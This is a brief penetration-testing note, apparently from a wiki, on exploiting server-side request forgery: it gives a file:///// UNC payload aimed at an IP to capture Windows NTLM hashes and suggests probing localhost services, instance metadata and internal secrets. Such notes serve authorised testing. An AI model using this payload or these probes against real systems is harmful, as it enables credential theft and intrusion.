SSRF
So many things!
If you've determined you can control server side requests, there are many things to ALWAYS check.
If it's a windows box, you may be able to steal NTLM hashes with file://///10.1.1.1/smb/file.txt
. This does require FIVE FORWARD SLASHES sometimes!
Check for any other internal service which may be open on localhost only.
Try to find internal secrets or instance metadata!
Check for any restricted pages which may show additional information to the server
Last updated